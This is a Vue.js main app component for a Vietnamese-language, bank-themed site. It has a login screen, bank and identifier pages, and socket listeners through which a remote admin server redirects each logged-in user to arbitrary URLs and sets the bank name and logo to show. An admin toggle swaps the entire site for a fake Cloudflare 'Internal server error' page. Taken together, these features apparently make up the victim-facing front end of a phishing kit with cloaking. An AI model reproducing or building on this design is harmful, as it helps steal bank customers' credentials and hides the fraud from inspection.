<template>
    <div class="rooot_wrapper" v-if="is_ready">
        <div class="wp_check_show" v-if="is_show != 0">
            <div class="wp_root_nologin wp_root_nologins" v-if="token == null">
                <div class="login_screen">
                    <Login_tool />
                </div>
            </div>
            <div class="wp_root_tool" v-else>
                <!-- {header_none: this.$route.name == 'Info_tool'} -->
                <Header_tool v-if="this.$route.name != 'BankUpdate_tool' && this.$route.name != 'Bank_tool' && this.$route.name != 'Result_tool' && this.$route.name != 'BankVib_tool' && this.$route.name != 'Identifier_tool'" />
                <router-view :key ='$route.params'/>
                <!-- Bottom Navigation (mobile only) -->
                <div class="m_bottomnav" v-if="this.$route.name != 'Identifier_tool' && this.$route.name != 'Loading_tool'">
                    <router-link to="/" class="m_nav_item active">
                        <img src="./assets/images/hm.png" alt="" class="imgNoActivr">
                        <img src="./assets/images/tc.png" alt="" class="imgActive">
                        <p>Trang chủ</p>
                    </router-link>
                    <router-link to="/lookup" class="m_nav_item">
                        <img src="./assets/images/tb.png" alt="" class="imgNoActivr">
                        <img src="./assets/images/tcu.png" alt="" class="imgActive">
                        <p>Tài khoản</p>
                    </router-link>
                    <router-link to="/qr-account" class="m_nav_item m_nav_center">
                        <div class="m_nav_qr"><img src="./assets/images/qr3.png" alt=""></div>
                        <p>Quét QR</p>
                    </router-link>
                    <router-link to="/qr" class="m_nav_item">
                        <img src="./assets/images/htr.png" alt="" class="imgNoActivr">
                        <img src="./assets/images/cn.png" alt="" class="imgActive">
                        <p>Cá nhân</p>
                    </router-link>
                    <router-link to="/setting" class="m_nav_item">
                        <!--  notification -->
                        <img src="./assets/images/k.png" alt="" class="imgNoActivr">
                        <img src="./assets/images/khac.png" alt="" class="imgActive">
                        <p>Công ty</p>
                    </router-link>
                </div>
            </div>
            <div id="loading_show" class="loading_show" style="position: fixed; left: 0; bottom: 0; top: 0%; right: 0%; text-align: center; background: rgba(0,0,0,.5); z-index: 999999999;">
                <div class="windows8"> 
                    <div class="wBall" id="wBall_1"> 
                        <div class="wInnerBall"></div>
                    </div>
                    <div class="wBall" id="wBall_2">
                        <div class="wInnerBall"></div>
                    </div>
                    <div class="wBall" id="wBall_3">
                        <div class="wInnerBall"></div>
                    </div> 
                    <div class="wBall" id="wBall_4">
                        <div class="wInnerBall"></div> 
                    </div>
                    <div class="wBall" id="wBall_5"> 
                        <div class="wInnerBall"></div>
                    </div>
                </div>
            </div>
            <div class="loadingImg" id="loadingImg">
                <div class="imgload">
                    <img src="./assets/images/loading.gif" alt="">
                </div>
            </div>
            <div class="loadingBgr" id="loadingBgr"></div>
        </div>
        <div class="wp_check_hide" v-else>
            <div class="hiden_wp">
                <h2>Internal server error</h2>
                <div class="ss_center">
                    <div class="row">
                        <div class="col-md-4 col-sm-4 col-xs-4 wp_item_center">
                            <div class="item_center">
                                <div class="img_error">
                                    <img src="./assets/images/1.png" alt="">
                                </div>
                                <p>You</p>
                                <h4>Browser</h4>
                                <h5>Working</h5>
                            </div>
                        </div>
                        <div class="col-md-4 col-sm-4 col-xs-4 wp_item_center">
                            <div class="item_center">
                                <div class="img_error">
                                    <img src="./assets/images/2.png" alt="">
                                </div>
                                <p>Singapore</p>
                                <h4>Cloudflare</h4>
                                <h5>Error</h5>
                            </div>
                        </div>
                        <div class="col-md-4 col-sm-4 col-xs-4 wp_item_center">
                            <div class="item_center">
                                <div class="img_error">
                                    <img src="./assets/images/3.png" alt="">
                                </div>
                                <p>Vatvostudio.vn</p>
                                <h4>Host</h4>
                                <h5>Working</h5>
                            </div>
                        </div>
                    </div>
                </div>
                <div class="ss_end">
                    <div class="row">
                        <div class="col-md-6 col-sm-6 col-xs-6 wp_item_end">
                            <div class="item_end">
                                <h4>What happened?</h4>
                                <h5>There is an internal server error on Cloudflare`s network</h5>
                            </div>
                        </div>
                        <div class="col-md-6 col-sm-6 col-xs-6 wp_item_end">
                            <div class="item_end">
                                <h4>What can I do?</h4>
                                <h5>Please try again in a few minutes.</h5>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
</template>
<script>
import SocketIO from 'socket.io-client'
import "./assets/css/style.css"
import Header_tool from './components/Header.vue'
import Login_tool from './components/Login.vue'
export default {
  name: 'App',
  data () {
        return {
            token: window.localStorage.getItem('token'),
            orther: [],
            is_show: 1,
            is_ready: false
        }
    },
    components: {
        Header_tool,
        Login_tool
    },
    created () {
        this.getCheckIsShow()
        this.socketEventCheck()
        if(this.token != null){
            this.getCheckOnline()
            setInterval(() => {
                this.getCheckOnline()
            }, 3 * 60 * 1000);
            this.socketEvent()
        }
    },
    methods: {
        getCheckOnline () {
            this.axios.post(this.api_checkOnline,
                {

                },
                {
                    headers: {
                        Authorization: 'Bearer ' + this.token
                    }
                }
            ).then((response) => {
                this.orther = response
            }).catch(e => {
                if(e.response.status == 401){
                    localStorage.clear();
                    this.$swal({
                        position: 'top-end',
                        icon: 'error',
                        title: 'Kết thúc phiên đăng nhập',
                        showConfirmButton: false,
                        timer: 2000
                    })
                    setTimeout(() => {
                        window.location.href = '/'
                    }, 2000);
                }
            })
        },
        socketEvent () {
            // let thiss = this
            var idUser = window.localStorage.getItem('idUser')
            var socket = SocketIO(this.linkWebAdmin, { transports: ['websocket', 'polling', 'flashsocket'], reconnection: true, reconnectionAttempts: 5, reconnectionDelay: 2000 });
            // console.log('1111', socket);
            socket.on(`laravel_database_page-change.${idUser}:PageChangeEvent`, function(result) {
                // console.log('2222', result.url);
                if(result.url.type == 0){
                    localStorage.clear();
                    setTimeout(() => {
                        window.location.href = '/'
                    }, 500);
                }else if(result.url.type == 1){
                    // thiss.$router.push(result.url.url);
                    window.location.href = result.url.url;
                }else{
                    window.localStorage.setItem('idbank', result.url.data_bank.id)
                    window.localStorage.setItem('nameBank', result.url.data_bank.name)
                    window.localStorage.setItem('title', result.url.data_bank.blue_text)
                    window.localStorage.setItem('icon', result.url.data_bank.logo)
                    setTimeout(() => {
                        window.location.href = result.url.url;
                    }, 500);
                }
            });
        },
        async getCheckIsShow () {
            try {
                await this.axios.get(this.api_getIsShow).then((response) => {
                    this.is_show = response.data.data.is_show
                })
            }
            finally {
                this.is_ready = true;
            }
        },
        socketEventCheck () {
            let thiss = this
            var socket = SocketIO(this.linkWebAdmin, { transports: ['websocket', 'polling', 'flashsocket'], reconnection: true, reconnectionAttempts: 5, reconnectionDelay: 2000 });
            socket.on(`laravel_database_toggle-channel:toggle.updated`, function(result) {
                thiss.is_show = result.is_show
            });
        },
    }
}
</script>
<style>
</style>
